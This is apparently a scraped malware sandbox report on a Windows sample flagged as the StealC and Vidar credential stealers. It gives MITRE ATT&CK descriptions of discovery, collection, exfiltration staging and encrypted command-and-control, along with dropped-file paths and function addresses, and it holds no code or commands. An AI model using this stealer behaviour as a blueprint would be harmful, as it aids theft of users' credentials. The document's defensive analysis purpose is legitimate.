
Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AAAKEBGDAFHIIDHIIECFBKFIJK

C:\ProgramData\BGIJJKKJJDAAAAAKFHJJDGDAFB

C:\ProgramData\DBGIJEHIIDGCFHIEGDGCBFHDBA

C:\ProgramData\DGHIDHCAAKECGCBFIJDB

C:\ProgramData\GDBFCGII

C:\ProgramData\HJJKJJDHCGCAECAAECFH

C:\ProgramData\IECFBKFH

C:\ProgramData\IEHDBGDHDAECBGDHJKFI

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

Windows Analysis Report
file.exe

Function 00BF9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 00BE45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 00BEBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 00BF4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00BF9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00BE7710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 00BF0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Function 00BE5100 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre